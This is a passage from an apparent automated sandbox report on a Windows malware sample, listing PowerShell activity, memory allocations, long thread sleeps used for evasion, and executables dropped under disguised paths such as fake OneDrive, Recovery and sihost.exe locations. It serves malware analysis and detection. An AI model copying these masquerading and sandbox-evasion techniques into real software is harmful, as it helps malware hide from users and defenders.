                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeMemory allocated: 2770000 memory reserve | memory write watchJump to behavior
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeMemory allocated: 1A8F0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMemory allocated: BB0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMemory allocated: 1A7E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMemory allocated: 2360000 memory reserve | memory write watchJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMemory allocated: 1A4E0000 memory reserve | memory write watchJump to behavior
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeMemory allocated: 2E20000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeMemory allocated: 1B0D0000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeMemory allocated: 1720000 memory reserve | memory write watch
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeMemory allocated: 1B530000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exeMemory allocated: 14F0000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exeMemory allocated: 1AF80000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exeMemory allocated: 2870000 memory reserve | memory write watch
                        Source: C:\Users\Default\Documents\sihost.exeMemory allocated: 1AA60000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMemory allocated: 1380000 memory reserve | memory write watch
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeMemory allocated: 1AD10000 memory reserve | memory write watch
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477Jump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Recovery\OXiaaPzsOIsoqrAHYxAVs.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Users\Default\Documents\sihost.exeThread delayed: delay time: 922337203685477
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exeThread delayed: delay time: 922337203685477
                        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1437
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1225
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1527
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1131
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1215
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 852
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1012
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1368
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1097
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1483
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1499
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 894
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1313
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1366
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1364
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1393
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 976
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1417
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 899
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\gLKxhGkC.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\rzpnRRfk.logJump to dropped file
                        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeDropped PE file which has not been started: C:\Windows\System32\SecurityHealthSystray.exeJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\IGGSkEKz.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\jwqNoTvv.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\ppTmQzAj.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\izOFSTgA.logJump to dropped file
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exeDropped PE file which has not been started: C:\Users\user\Desktop\AdxdALuR.logJump to dropped file
                        Source: C:\Users\user\Desktop\KzLetzDiM8.exeEvasive API call chain: GetLocalTime,DecisionNodesgraph_0-23682
                        Source: C:\fontdriversavescrt\ComComponentDriverInto.exe TID: 7028Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe TID: 4416Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Program Files\Microsoft\OneDrive\ListSync\settings\ComComponentDriverInto.exe TID: 8896Thread sleep time: -922337203685477s >= -30000sJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7864Thread sleep count: 1437 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8960Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8652Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7736Thread sleep count: 1225 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8928Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8680Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7844Thread sleep count: 1527 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8992Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3264Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7780Thread sleep count: 1131 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8912Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8632Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7784Thread sleep count: 1215 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8984Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8640Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7992Thread sleep count: 852 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8948Thread sleep time: -1844674407370954s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8580Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8132Thread sleep count: 1012 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8916Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8616Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8044Thread sleep count: 1368 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8952Thread sleep time: -10145709240540247s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7400Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8040Thread sleep count: 1097 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8968Thread sleep time: -9223372036854770s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8672Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8036Thread sleep count: 1483 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8956Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8600Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8268Thread sleep count: 1499 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8944Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8720Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8200Thread sleep count: 894 > 30
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8936Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7616Thread sleep time: -922337203685477s >= -30000s
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 8288Thread sleep count: 1313 > 30
